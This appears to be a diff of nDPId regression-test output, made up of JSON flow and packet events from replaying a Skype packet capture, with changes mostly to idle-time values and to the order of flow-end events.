+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3171,"source":"skype.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":2,"flow_last_seen":1431969788813,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969788813,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8euxAAHMGmcdOyuJzwKgBInGDw984j2+76tKJUqASIAAVbgAAAgQFrAEDAwgEAggKAlDJPj4kw\/o="} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3172,"source":"skype.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":3,"flow_last_seen":1431969788813,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969788813,"pkt":"0NQSxnP1PBXCt3IOCABFAAA00tZAAEAGdOXAqAEiTsric8PfcYPq0olSOI9vvIAQECxTqwAAAQEICj4kxFYCUMk+"} 00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3181,"source":"skype.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1431969789358,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1431969789358,"pkt":"AQBeAAABoPPBbTu2CABG2AAgAAAAAAECgljAqAD+4AAAAZQEAAARZO6bAAAAAA=="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3185,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969789832,"flow_last_seen":1431969789832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969789832,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50144,"dst_port":29059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3185,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":1,"flow_last_seen":1431969789832,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969789832,"pkt":"0NQSxnP1PBXCt3IOCABFAABAcbhAAEAG1ffAqAEiTsric8PgcYPYQ6AmAAAAALAC\/\/+PtQAAAgQFtAEDAwUBAQgKPiTITAAAAAAEAgAA"} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3185,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969789832,"flow_last_seen":1431969789832,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969789832,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50144,"dst_port":29059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3185,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":1,"flow_last_seen":1431969789832,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969789832,"pkt":"0NQSxnP1PBXCt3IOCABFAABAcbhAAEAG1ffAqAEiTsric8PgcYPYQ6AmAAAAALAC\/\/+PtQAAAgQFtAEDAwUBAQgKPiTITAAAAAAEAgAA"} 00539{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3186,"source":"skype.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969789851,"flow_last_seen":1431969789851,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969789851,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 
00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3186,"source":"skype.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":1,"flow_last_seen":1431969789851,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1431969789851,"pkt":"AQBeAAD7PBXCt3IOCABGAAAgDOsAAAECdSfAqAEi4AAA+5QEAAAWAAkE4AAA+w=="} 00598{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3186,"source":"skype.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969789851,"flow_last_seen":1431969789851,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969789851,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3187,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":2,"flow_last_seen":1431969789919,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969789919,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8evFAAHMGmcJOyuJzwKgBInGDw+BU8I6O2EOgJ6ASIADRMgAAAgQFrAEDAwgEAggKAlDJrD4kyEw="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3188,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":3,"flow_last_seen":1431969789919,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969789919,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0W4RAAEAG7DfAqAEiTsric8PgcYPYQ6AnVPCOj4AQECwPdQAAAQEICj4kyKMCUMms"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3221,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969791166,"flow_last_seen":1431969791166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969791166,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50145,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3221,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":1,"flow_last_seen":1431969791166,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969791166,"pkt":"0NQSxnP1PBXCt3IOCABFAABA8JJAAEAGte\/AqAEinTg1M8PhMD4fbaHhAAAAALAC\/\/\/hugAAAgQFtAEDAwUBAQgKPiTNeQAAAAAEAgAA"} 
-00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969657367,"flow_last_seen":1431969678270,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969791465,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50033,"dst_port":40015,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969657367,"flow_last_seen":1431969678270,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969791465,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50033,"dst_port":40015,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969657367,"flow_last_seen":1431969676525,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969791465,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50034,"dst_port":40033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969657367,"flow_last_seen":1431969676525,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969791465,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50034,"dst_port":40033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431969675567,"flow_last_seen":1431969675716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1431969791465,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431969675567,"flow_last_seen":1431969675716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1431969791465,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969658979,"flow_last_seen":1431969678254,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969791465,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969658979,"flow_last_seen":1431969678254,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969791465,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50038,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969658978,"flow_last_seen":1431969677390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":396,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969791465,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969658978,"flow_last_seen":1431969677390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":396,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969791465,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":2,"flow_last_seen":1431969792168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969792168,"pkt":"0NQSxnP1PBXCt3IOCABFAABA6r1AAEAGu8TAqAEinTg1M8PhMD4fbaHhAAAAALAC\/\/\/d0gAAAgQFtAEDAwUBAQgKPiTRYQAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3227,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969792778,"flow_last_seen":1431969792778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969792778,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50146,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3227,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":1,"flow_last_seen":1431969792778,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969792778,"pkt":"0NQSxnP1PBXCt3IOCABFAABACyhAAEAGm1rAqAEinTg1M8PiAbsrN9oxAAAAALAC\/\/\/F2QAAAgQFtAEDAwUBAQgKPiTTwgAAAAAEAgAA"} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3228,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":3,"flow_last_seen":1431969793170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969793170,"pkt":"0NQSxnP1PBXCt3IOCABFAABATYlAAEAGWPnAqAEinTg1M8PhMD4fbaHhAAAAALAC\/\/\/Z6gAAAgQFtAEDAwUBAQgKPiTVSQAAAAAEAgAA"} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3231,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":2,"flow_last_seen":1431969793781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969793781,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXRdAAEAGSWvAqAEinTg1M8PiAbsrN9oxAAAAALAC\/\/\/B8AAAAgQFtAEDAwUBAQgKPiTXqwAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3187,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":2,"flow_last_seen":1431969789919,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969789919,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8evFAAHMGmcJOyuJzwKgBInGDw+BU8I6O2EOgJ6ASIADRMgAAAgQFrAEDAwgEAggKAlDJrD4kyEw="} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3188,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":3,"flow_last_seen":1431969789919,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969789919,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0W4RAAEAG7DfAqAEiTsric8PgcYPYQ6AnVPCOj4AQECwPdQAAAQEICj4kyKMCUMms"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3221,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969791166,"flow_last_seen":1431969791166,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969791166,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50145,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3221,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":1,"flow_last_seen":1431969791166,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969791166,"pkt":"0NQSxnP1PBXCt3IOCABFAABA8JJAAEAGte\/AqAEinTg1M8PhMD4fbaHhAAAAALAC\/\/\/hugAAAgQFtAEDAwUBAQgKPiTNeQAAAAAEAgAA"} 
+00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969643944,"flow_last_seen":1431969668477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1431969791465,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50030,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969643944,"flow_last_seen":1431969668477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1431969791465,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50030,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969642336,"flow_last_seen":1431969661480,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969791465,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50026,"dst_port":40002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969642336,"flow_last_seen":1431969661480,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969791465,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50026,"dst_port":40002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":2,"flow_last_seen":1431969792168,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969792168,"pkt":"0NQSxnP1PBXCt3IOCABFAABA6r1AAEAGu8TAqAEinTg1M8PhMD4fbaHhAAAAALAC\/\/\/d0gAAAgQFtAEDAwUBAQgKPiTRYQAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3227,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969792778,"flow_last_seen":1431969792778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969792778,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50146,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3227,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":1,"flow_last_seen":1431969792778,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969792778,"pkt":"0NQSxnP1PBXCt3IOCABFAABACyhAAEAGm1rAqAEinTg1M8PiAbsrN9oxAAAAALAC\/\/\/F2QAAAgQFtAEDAwUBAQgKPiTTwgAAAAAEAgAA"} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3228,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":3,"flow_last_seen":1431969793170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969793170,"pkt":"0NQSxnP1PBXCt3IOCABFAABATYlAAEAGWPnAqAEinTg1M8PhMD4fbaHhAAAAALAC\/\/\/Z6gAAAgQFtAEDAwUBAQgKPiTVSQAAAAAEAgAA"} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3231,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":2,"flow_last_seen":1431969793781,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969793781,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXRdAAEAGSWvAqAEinTg1M8PiAbsrN9oxAAAAALAC\/\/\/B8AAAAgQFtAEDAwUBAQgKPiTXqwAAAAAEAgAA"} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3232,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969793871,"flow_last_seen":1431969793871,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969793871,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55893,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3232,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":1,"flow_last_seen":1431969793871,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969793871,"pkt":"0NQSxnP1PBXCt3IOCABFAAA68cwAAEARBXPAqAEiwKgBAdpVADUAJgS+DhkBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} 00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3232,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969793871,"flow_last_seen":1431969793871,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969793871,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55893,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"ui.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3234,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":3,"flow_last_seen":1431969794784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969794784,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/CFAAEAGqmDAqAEinTg1M8PiAbsrN9oxAAAAALAC\/\/++BwAAAgQFtAEDAwUBAQgKPiTblAAAAAAEAgAA"} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3234,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":3,"flow_last_seen":1431969794784,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969794784,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/CFAAEAGqmDAqAEinTg1M8PiAbsrN9oxAAAAALAC\/\/++BwAAAgQFtAEDAwUBAQgKPiTblAAAAAAEAgAA"} 